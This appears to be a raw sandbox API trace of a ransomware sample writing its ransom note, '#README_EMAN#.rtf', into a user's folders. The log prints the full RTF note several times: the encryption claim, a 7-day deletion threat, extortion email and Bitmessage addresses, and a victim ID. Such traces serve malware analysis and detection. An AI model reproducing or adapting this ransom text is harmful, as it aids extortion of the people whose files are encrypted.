k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nEwJVUzEVMBMGA1UEChMMRGl\x93/", lpUsedDefaultChar=0x0) returned 8717 [0298.817] WriteFile (in: hFile=0x27c, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.818] CloseHandle (hObject=0x27c) returned 1 [0298.818] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ka\\#readme_eman#.rtf")) returned 0xffffffff [0298.818] GetLastError () returned 0x2 [0298.818] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ka\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 